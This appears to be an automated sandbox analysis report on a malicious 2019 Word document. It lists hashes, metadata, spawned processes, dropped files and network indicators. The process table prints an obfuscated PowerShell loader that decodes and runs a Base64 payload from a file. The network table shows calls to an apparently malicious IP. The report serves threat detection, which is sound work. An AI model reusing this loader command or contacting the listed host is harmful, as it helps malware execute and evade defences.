| Field | Value |
|---|---|
| Download | 0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad |
| Full analysis | https://app.any.run/tasks/c81adfe4-fe83-42bc-92a1-70c0483892d6 |
| Verdict | Malicious activity |
| Analysis date | May 15, 2019, 09:45:33 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Babak Amiri, Template: Normal, Last Saved By: jack, Revision Number: 19, Name of Creating Application: Microsoft Office Word, Total Editing Time: 33:00, Create Time/Date: Tue Apr 23 22:18:00 2019, Last Saved Time/Date: Thu May 2 15:26:00 2019, Number of Pages: 1, Number of Words: 118, Number of Characters: 678, Security: 0 |
| MD5 | 036F4400BABDAA314AB5AA4A2C378E2F |
| SHA1 | 319CBD82A2B64BDA4715F9690E2E02EDBDB076F0 |
| SHA256 | 0F3CABC7F1E69D4A09856CC0135F7945850C1EB6AEECD010F788B3B8B4D91CAD |
| SSDEEP | 6144:nxgVouPfhvgAQB2QGVofCleAwZnNc+Q3sSB2LljR02VS:xgVoQhoAQoIfClb2nQ3DmjTVS |
| Extension | File type | Score |
|---|---|---|
| .doc | Microsoft Word document | 54.2 |
| .doc | Microsoft Word document (old ver.) | 32.2 |
| Document property | Value |
|---|---|
| CompObjUserType | Microsoft Word 97-2003 Document |
| CompObjUserTypeLen | 32 |
| HeadingPairs | |
| TitleOfParts | - |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 15 |
| CharCountWithSpaces | 795 |
| Paragraphs | 1 |
| Lines | 5 |
| Company | - |
| CodePage | Windows Latin 1 (Western European) |
| Security | None |
| Characters | 678 |
| Words | 118 |
| Pages | 1 |
| ModifyDate | 2019:05:02 14:26:00 |
| CreateDate | 2019:04:23 21:18:00 |
| TotalEditTime | 33.0 minutes |
| Software | Microsoft Office Word |
| RevisionNumber | 19 |
| LastModifiedBy | jack |
| Template | Normal |
| Comments | - |
| Keywords | - |
| Author | Babak Amiri |
| Subject | - |
| Title | - |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3376 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| 2648 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
| 2736 | "C:\Windows\regedit.exe" | C:\Windows\regedit.exe | — | explorer.exe |
| 3528 | "C:\Windows\regedit.exe" | C:\Windows\regedit.exe | — | explorer.exe |
| 2544 | "C:\Windows\System32\cmd.exe" | C:\Windows\System32\cmd.exe | — | explorer.exe |
| 1928 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nologo -w 1 -exec bypass -c "$ste=gc c:\programdata\SysTextEnc.ini;iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($ste)))" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |

| PID | User | Company | Integrity Level | Description | Exit code | Version |
|---|---|---|---|---|---|---|
| 3376 | admin | Microsoft Corporation | MEDIUM | Microsoft Word | — | 14.0.6024.1000 |
| 2648 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 3221225786 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2736 | admin | Microsoft Corporation | MEDIUM | Registry Editor | 3221226540 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 3528 | admin | Microsoft Corporation | HIGH | Registry Editor | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2544 | admin | Microsoft Corporation | HIGH | Windows Command Processor | — | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 1928 | admin | Microsoft Corporation | HIGH | Windows PowerShell | — | 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREE83.tmp.cvr | — | — | — |
| 3376 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DF7A98D2E3D1388CB5.TMP | — | — | — |
| 1928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CEYBVOR97RK7JYWQPVUK.temp | — | — | — |
| 3376 | WINWORD.EXE | C:\Users\admin\Desktop\~$3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad.doc | pgc | 05E40F81265F95F5F7EAD33F1EFF3F62 | 359400D93378BA4E0C40249A107AF9E0542181873DA06E18B012616A1EA147A3 |
| 3376 | WINWORD.EXE | C:\Users\admin\Desktop\0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad.doc | document | 2180643CEE008A67C6E2D89A235C5800 | 777003C0361353B37CEDAE377D6EB4B87693B3B1DF895F9EE22D01D2BEA51E37 |
| 3376 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 1DBF94C52019F3FA68C5F190CC8E718C | D3BE336F578B31B1E3E6BD5ABD73B111AB652DB1A9E30959ED3E7F3480EC098E |
| 3376 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad.doc.LNK | lnk | 8748AAE709AB1FB1A7AF888CCB724BFA | 3F1DFEF6458913BF33C2B495A7DA067175216CCB405E2E4CCE66BD8BDB07285D |
| 3376 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 358CBFEB32E53F906502BC1377A1F64D | B3735A5C81D001635DB72D1BCE98A411B19A08C514379E05FB0F7C7EB2EB94FB |
| 3376 | WINWORD.EXE | C:\Users\admin\Desktop\~WRD0000.tmp | document | 924E138192609FA03B84802D3CEBF78C | 495A2CF2C761D40CA6D961CB27F418944C17D0350F597B0306083FF3FB2B365C |
| 1928 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | CFCC2302AE96577C0F000A7AE3D87EBD | C9A01D9A29ADF26A17994352A90FB28871F2FF1CB9FE7FB61664433D42BF0BF8 |
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 1928 | powershell.exe | GET | — | 38.132.99.167:80 | http://38.132.99.167/crf.txt | US | — | — | suspicious |
| 1928 | powershell.exe | GET | — | 38.132.99.167:80 | http://38.132.99.167/crf.txt | US | — | — | suspicious |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| — | — | 38.132.99.167:80 | — | M247 Ltd | US | suspicious |